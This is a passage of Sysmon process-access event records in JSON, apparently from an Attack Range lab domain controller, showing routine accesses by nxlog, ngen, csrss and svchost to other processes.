{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.981\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-00105AE40A00}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.981","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-00105AE40A00}","TargetProcessId":"800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.981\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1322-5F25-0000-00105AE40A00}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.981","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1322-5F25-0000-00105AE40A00}","TargetProcessId":"800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-001087130D00}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001087130D00}","TargetProcessId":"800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.044\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001039EF0B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.044","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001039EF0B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.044\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001039EF0B00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.044","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001039EF0B00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.059\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-001057170D00}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:18.059","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-001057170D00}","TargetProcessId":"4148","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:18.106\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-00105B1B0D00}\r\nTargetProcessId: 2556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.d